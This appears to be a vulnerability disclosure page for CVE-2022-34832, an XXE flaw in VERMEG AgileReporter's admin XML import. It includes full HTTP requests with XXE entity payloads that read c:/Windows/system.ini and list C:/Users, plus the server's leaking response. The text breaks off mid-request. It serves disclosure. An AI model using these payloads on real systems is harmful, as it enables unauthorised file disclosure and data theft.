Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-34832: XXE in AgileReporter 21.3 by VERMEG

An issue was discovered in VERMEG AgileReporter 21.3. XXE can occur via an XML document to the Analysis component.

CVE
Open in Source
#xss#vulnerability#web#windows#dos#js#java#firefox#sap

Local file inclusion, Directory Listing, Denial of Service though XML External entity (XXE) injection.
Note: Only Admin user is able to expolit the vulnerability.

  1. DoS:
    The XML parser in “Config Package Bindind” --> “Manage Execution Groups” option is vulnerable to XXE. An uploaded file with XML Bomb caused Denial of Service for hours.

    Uploading the malicious xml file and the content of it:

The web application (not only this page) was unavaiable for hours:

So this was the low hanging fruit. Realizing that the webapp expects an xml file as a souce of data and upload an XML bomb.

But there are possibilities to exploit this vulnerability to retrieve sensitive data from the server.
So there is an “Export button” next to "Import file button". This was my sample to upload more Execution Groups and their additional details. The easies way to show the LFI and Directory listing is putting the Requests and Reposes here.

Local File Inclusion and Directory listing:I was able to exploit the vulnerability to perform Directory listing and Local File Inclusion. In this way I was able to access the file system (system files and user data also) and the content of mounted drives, so the process were running with a higher privilege.

The method was the same but the uploaded file was a modified version of a previously exported “Execution Group”. In this way I could declare an entity (

highlighted with green) and call it later in the document. In this way I got the content of c:/Windows/system.ini after calling &xxe; variable in the response.

  1. LFI
    Request

POST /agilereporter/core/page/admin/config/configPackageBinding.xhtml?dswid=-3091 HTTP/1.1
Host: …removed by tester
Cookie: primefaces.download=true; JSESSIONID=0C-36ywhTHY_iTtHmixjOwS5qt8jhSSDg3va51N5.sgazrapp008; ApplicationGatewayAffinityCORS=a317a76f28f83936cb54aa5701a2aabd; ApplicationGatewayAffinity=a317a76f28f83936cb54aa5701a2aabd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22114693211599442001093007703
Content-Length: 11355
Origin: https:// …removed by tester
Dnt: 1
Referer: https://…removed by tester
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm"

importFileForm
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:ImportInfoTable_rppDD"

10
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:ImportInfoTable_scrollState"

0,0
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.ViewState"

-1207254338988663714:6479361099775717792
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.ClientWindow"

-3091
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.ajax"

true
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.execute"

importFileForm:importFileUpload
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.source"

importFileForm:importFileUpload
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.render"

importFileForm:messages importFileForm:listuploadedFileName importFileForm:listimportBtn importFileForm:ImportInfoTable
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:importFileUpload"; filename="ExecutionGroupExport_18032022_xml_play01.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="GBK" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY

xxe SYSTEM “c:/Windows/system.ini” >]>
<ExecutionGroupDto xmlns="http://www.lombardrisk.com/ocelot/executionGroup">
<configPrefix>MAS</configPrefix>
<item>
<name>Computeeeee &xxe; & Retrieve R610</name>
<description>Compute & Retrieve R610</description>
<content>{"configPrefix":"MAS","name":"Compute \u0026 Retrieve R610","description":"Compute \u0026 Retrieve R610","abortOnFailure":true,"batchRunJobs":[{"configPrefix":"MAS","name":"LOADDATA","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":0},{"configPrefix":"MAS","name":"INTERFACE","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":1},{"configPrefix":"MAS","name":"MAS610PREPRO","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":2},{"configPrefix":"MAS","name":"MAS610B12","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":3},{"configPrefix":"MAS","name":"MAS610B3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":5},{"configPrefix":"MAS","name":"MAS610C1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":7},{"configPrefix":"MAS","name":"MAS610D1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":9},{"configPrefix":"MAS","name":"MAS610D2","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":11},{"configPrefix":"MAS","name":"MAS610D3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":13},{"configPrefix":"MAS","name":"MAS610D4","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":15},{"configPrefix":"MAS","name":"MAS610D5","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":17},{"configPrefix":"MAS","name":"MAS610E1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":19},{"configPrefix":"MAS","name":"MAS610E2","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":21},{"configPrefix":"MAS","name":"MAS610E3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":23},{"configPrefix":"MAS","name":"MAS610F","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":25},{"configPrefix":"MAS","name":"MAS610G","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":27},{"configPrefix":"MAS","name":"MAS610H","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":29},{"configPrefix":"MAS","name":"MAS610I","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":31},{"configPrefix":"MAS","name":"MAS610J","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":33},{"configPrefix":"MAS","name":"MAS610K","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":35},{"configPrefix":"MAS","name":"MAS610L","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":37},{"configPrefix":"MAS","name":"MAS610M","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":39}],"computeJobs":[{"configPrefix":"MAS","formName":"MAS610_B1_B2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":4},{"configPrefix":"MAS","formName":"MAS610_B3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":6},{"configPrefix":"MAS","formName":"MAS610_C1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":8},{"configPrefix":"MAS","formName":"MAS610_D1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":10},{"configPrefix":"MAS","formName":"MAS610_D2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":12},{"configPrefix":"MAS","formName":"MAS610_D3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":14},{"configPrefix":"MAS","formName":"MAS610_D4","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":16},{"configPrefix":"MAS","formName":"MAS610_D5","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":18},{"configPrefix":"MAS","formName":"MAS610_E1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":20},{"configPrefix":"MAS","formName":"MAS610_E2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":22},{"configPrefix":"MAS","formName":"MAS610_E3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":24},{"configPrefix":"MAS","formName":"MAS610_F","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":26},{"configPrefix":"MAS","formName":"MAS610_G","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":28},{"configPrefix":"MAS","formName":"MAS610_H","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":30},{"configPrefix":"MAS","formName":"MAS610_I","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":32},{"configPrefix":"MAS","formName":"MAS610_J","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":34},{"configPrefix":"MAS","formName":"MAS610_K","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":36},{"configPrefix":"MAS","formName":"MAS610_L","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":38},{"configPrefix":"MAS","formName":"MAS610_M","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":40}]}</content>
</item>
<item>
<name>Retrieve R610</name>
<description>Retrieve R610 Reports</description>
<content>{"configPrefix":"MAS","name":"Retrieve R610","description":"Retrieve R610 Reports","abortOnFailure":true,"batchRunJobs":[],"computeJobs":[{"formName":"MAS610_B1_B2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":0},{"formName":"MAS610_B3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":1},{"formName":"MAS610_C1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":2},{"formName":"MAS610_D1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":3},{"formName":"MAS610_D2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":4},{"formName":"MAS610_D3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":5},{"formName":"MAS610_D4","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":6},{"formName":"MAS610_D5","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":7},{"formName":"MAS610_E1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":8},{"formName":"MAS610_E2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":9},{"formName":"MAS610_E3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":10},{"formName":"MAS610_F","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":11},{"formName":"MAS610_G","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":12},{"formName":"MAS610_H","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":13},{"formName":"MAS610_I","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":14},{"formName":"MAS610_J","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":15},{"formName":"MAS610_K","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":16},{"formName":"MAS610_L","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":17},{"formName":"MAS610_M","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":18}]}</content>
</item>
</ExecutionGroupDto>

-----------------------------22114693211599442001093007703–

Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2022 20:37:12 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
Expires: 0
CACHE-CONTROL: NO-CACHE
CACHE-CONTROL: no-cache, no-store, must-revalidate
CACHE-CONTROL: no-cache
X-XSS-Protection: 1; mode=block
PRAGMA: NO-CACHE
PRAGMA: no-cache
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Content-Length: 9907

<?xml version=’1.0’ encoding=’UTF-8’?>
<partial-response><changes><update id="importFileForm:messages"><![CDATA[<div id="importFileForm:messages" class="ui-messages ui-widget" aria-live="polite"></div>]]></update><update id="importFileForm:listuploadedFileName"><![CDATA[<span id="importFileForm:listuploadedFileName"></span>]]></update><update id="importFileForm:ImportInfoTable"><![CDATA[<div id="importFileForm:ImportInfoTable" class="ui-datatable ui-widget ui-datatable-scrollable borderless headerClass tableFixClass" style="width:800px;"><div class="ui-widget-header ui-datatable-scrollable-header"><div class="ui-datatable-scrollable-header-box"><table role="grid"><thead id="importFileForm:ImportInfoTable_head"><tr role="row"><th id="importFileForm:ImportInfoTable:j_idt348" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="level" scope="col" style="width:5%"><span class="ui-column-title">level</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt350" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="Type" scope="col" style="width:15%"><span class="ui-column-title">Type</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt352" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="action" scope="col" style="width:5%"><span class="ui-column-title">action</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th><th id="importFileForm:ImportInfoTable:j_idt354" class="ui-state-default ui-sortable-column" role="columnheader" aria-label="Content" scope="col" style="width:75%"><span class="ui-column-title">Content</span><span class="ui-sortable-column-icon ui-icon ui-icon-carat-2-n-s"></span><span class="ui-sortable-column-badge ui-helper-hidden"></span></th></tr></thead></table></div></div><div class="ui-datatable-scrollable-body" tabindex="-1"><table role="grid"><tbody id="importFileForm:ImportInfoTable_data" class="ui-datatable-data ui-widget-content"><tr data-ri="0" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">WARN</td><td role="gridcell" class="">Execution Group</td><td role="gridcell" class="">REMOVE</td><td role="gridcell" class="">Execution Group (Computeeeee & Retrieve R610) not in source file</td></tr><tr data-ri="1" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Group</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Group (Computeeeee ;

for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

& Retrieve R610)</td></tr><tr data-ri="2" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_B1_B2|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="3" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_B3|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="4" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_C1|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="5" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D1|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="6" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D2|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="7" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D3|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="8" class="ui-widget-content ui-datatable-even evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D4|1, Translate: false,Preserve adjustment: false)</td></tr><tr data-ri="9" class="ui-widget-content ui-datatable-odd evenoddRowClass" role="row"><td role="gridcell" class="">INFO</td><td role="gridcell" class="">Execution Item</td><td role="gridcell" class="">ADD</td><td role="gridcell" class="">Add new Execution Item(Compute: MAS|0001|MAS610_D5|1, Translate: false,Preserve adjustment: false)</td></tr></tbody></table></div><div class="ui-widget-header ui-datatable-scrollable-footer"><div class="ui-datatable-scrollable-footer-box"><table role="grid"></table></div></div><div id="importFileForm:ImportInfoTable_paginator_bottom" class="ui-paginator ui-paginator-bottom ui-widget-header ui-corner-bottom" role="navigation" aria-label="Pagination"><a href="#" class="ui-paginator-first ui-state-default ui-corner-all ui-state-disabled" aria-label="First Page" tabindex="-1"><span class="ui-icon ui-icon-seek-first">F</span></a><a href="#" class="ui-paginator-prev ui-state-default ui-corner-all ui-state-disabled" aria-label="Previous Page" tabindex="-1"><span class="ui-icon ui-icon-seek-prev">P</span></a><span class="ui-paginator-pages"><a class="ui-paginator-page ui-state-default ui-state-active ui-corner-all" tabindex="0" href="#">1</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">2</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">3</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">4</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">5</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">6</a><a class="ui-paginator-page ui-state-default ui-corner-all" tabindex="0" href="#">7</a></span><a href="#" class="ui-paginator-next ui-state-default ui-corner-all" aria-label="Next Page" tabindex="0"><span class="ui-icon ui-icon-seek-next">N</span></a><a href="#" class="ui-paginator-last ui-state-default ui-corner-all" aria-label="Last Page" tabindex="0"><span class="ui-icon ui-icon-seek-end">E</span></a><label id="importFileForm:ImportInfoTable:j_id156_rppLabel" for="importFileForm:ImportInfoTable:j_id156" class="ui-paginator-rpp-label ui-helper-hidden">Rows Per Page</label><select id="importFileForm:ImportInfoTable:j_id156" name="importFileForm:ImportInfoTable_rppDD" aria-labelledby="importFileForm:ImportInfoTable:j_id156_rppLabel" class="ui-paginator-rpp-options ui-widget ui-state-default ui-corner-left" autocomplete="off"><option value="5">5</option><option value="10" selected="selected">10</option><option value="20">20</option></select></div><input type="hidden" id="importFileForm:ImportInfoTable_scrollState" name="importFileForm:ImportInfoTable_scrollState" autocomplete="off" value="0,0" /></div><script id="importFileForm:ImportInfoTable_s" type="text/javascript">PrimeFaces.cw(“DataTable","ImportInfoTableVar",{id:"importFileForm:ImportInfoTable",paginator:{id:[‘importFileForm:ImportInfoTable_paginator_bottom’],rows:10,rowCount:64,page:0,currentPageTemplate:’({currentPage} of {totalPages})',pageLinks:20},scrollable:true,liveScroll:false,scrollStep:0,scrollLimit:64,liveScrollBuffer:0,virtualScroll:false,touchable:false,sorting:true,multiSort:true,sortMetaOrder:[‘’],groupColumnIndexes:[],disableContextMenuIfEmpty:false});</script>]]></update><update id="importFileForm:listimportBtn"><![CDATA[<button id="importFileForm:listimportBtn” name="importFileForm:listimportBtn" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only btn-blue-darken" onclick="PrimeFaces.ab({s:"importFileForm:listimportBtn",f:"importFileForm",u:"growl importFileForm executionGroupsForm executionItemsForm",onco:function(xhr,status,args,data){importNewHandleComplete(xhr, status, args); ;}});return false;" style="margin-right:10px;" type="submit"><span class="ui-button-text ui-c">Import</span></button><script id="importFileForm:listimportBtn_s" type="text/javascript">PrimeFaces.cw("CommandButton","widget_importFileForm_listimportBtn",{id:"importFileForm:listimportBtn"});</script>]]></update><update id="j_id1:javax.faces.ViewState:0"><![CDATA[-1207254338988663714:6479361099775717792]]></update><update id="j_id1:javax.faces.ClientWindow:0"><![CDATA[-3091]]></update><eval><![CDATA[resetSessionTimer();]]></eval></changes></partial-response>

2. Directory listing
Request
POST /agilereporter/core/page/admin/config/configPackageBinding.xhtml?dswid=-3091 HTTP/1.1
Host: …removed by tester
Cookie: primefaces.download=true; JSESSIONID=0C-36ywhTHY_iTtHmixjOwS5qt8jhSSDg3va51N5.sgazrapp008; ApplicationGatewayAffinityCORS=a317a76f28f83936cb54aa5701a2aabd; ApplicationGatewayAffinity=a317a76f28f83936cb54aa5701a2aabd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22114693211599442001093007703
Content-Length: 11350
Origin: https:// …removed by tester
Dnt: 1
Referer: https:// …removed by tester /agilereporter/core/page/admin/config/configPackageBinding.xhtml?dswid=-3091
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm"

importFileForm
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:ImportInfoTable_rppDD"

10
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:ImportInfoTable_scrollState"

0,0
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.ViewState"

-1207254338988663714:6479361099775717792
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.ClientWindow"

-3091
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.ajax"

true
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.execute"

importFileForm:importFileUpload
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.source"

importFileForm:importFileUpload
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="javax.faces.partial.render"

importFileForm:messages importFileForm:listuploadedFileName importFileForm:listimportBtn importFileForm:ImportInfoTable
-----------------------------22114693211599442001093007703
Content-Disposition: form-data; name="importFileForm:importFileUpload"; filename="ExecutionGroupExport_18032022_xml_play01.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="GBK" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY

xxe SYSTEM “file:///c:Users/” >]>
<ExecutionGroupDto xmlns="http://www.lombardrisk.com/ocelot/executionGroup">
<configPrefix>MAS</configPrefix>
<item>
<name>Computeeeee &xxe; & Retrieve R610</name>
<description>Compute & Retrieve R610</description>
<content>{"configPrefix":"MAS","name":"Compute \u0026 Retrieve R610","description":"Compute \u0026 Retrieve R610","abortOnFailure":true,"batchRunJobs":[{"configPrefix":"MAS","name":"LOADDATA","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":0},{"configPrefix":"MAS","name":"INTERFACE","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":1},{"configPrefix":"MAS","name":"MAS610PREPRO","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":2},{"configPrefix":"MAS","name":"MAS610B12","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":3},{"configPrefix":"MAS","name":"MAS610B3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":5},{"configPrefix":"MAS","name":"MAS610C1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":7},{"configPrefix":"MAS","name":"MAS610D1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":9},{"configPrefix":"MAS","name":"MAS610D2","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":11},{"configPrefix":"MAS","name":"MAS610D3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":13},{"configPrefix":"MAS","name":"MAS610D4","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":15},{"configPrefix":"MAS","name":"MAS610D5","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":17},{"configPrefix":"MAS","name":"MAS610E1","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":19},{"configPrefix":"MAS","name":"MAS610E2","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":21},{"configPrefix":"MAS","name":"MAS610E3","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":23},{"configPrefix":"MAS","name":"MAS610F","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":25},{"configPrefix":"MAS","name":"MAS610G","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":27},{"configPrefix":"MAS","name":"MAS610H","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":29},{"configPrefix":"MAS","name":"MAS610I","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":31},{"configPrefix":"MAS","name":"MAS610J","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":33},{"configPrefix":"MAS","name":"MAS610K","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":35},{"configPrefix":"MAS","name":"MAS610L","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":37},{"configPrefix":"MAS","name":"MAS610M","abortOnFailure":false,"translateBeforeCompute":false,"executeOrder":39}],"computeJobs":[{"configPrefix":"MAS","formName":"MAS610_B1_B2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":4},{"configPrefix":"MAS","formName":"MAS610_B3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":6},{"configPrefix":"MAS","formName":"MAS610_C1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":8},{"configPrefix":"MAS","formName":"MAS610_D1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":10},{"configPrefix":"MAS","formName":"MAS610_D2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":12},{"configPrefix":"MAS","formName":"MAS610_D3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":14},{"configPrefix":"MAS","formName":"MAS610_D4","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":16},{"configPrefix":"MAS","formName":"MAS610_D5","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":18},{"configPrefix":"MAS","formName":"MAS610_E1","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":20},{"configPrefix":"MAS","formName":"MAS610_E2","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":22},{"configPrefix":"MAS","formName":"MAS610_E3","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":24},{"configPrefix":"MAS","formName":"MAS610_F","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":26},{"configPrefix":"MAS","formName":"MAS610_G","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":28},{"configPrefix":"MAS","formName":"MAS610_H","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":30},{"configPrefix":"MAS","formName":"MAS610_I","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":32},{"configPrefix":"MAS","formName":"MAS610_J","formVersion":1,"entityCode":"0001","translateBeforeCompute":false,"preserveAdjustment":false,"initToZero":true,"executeOrder":34},{"configPrefix":"MA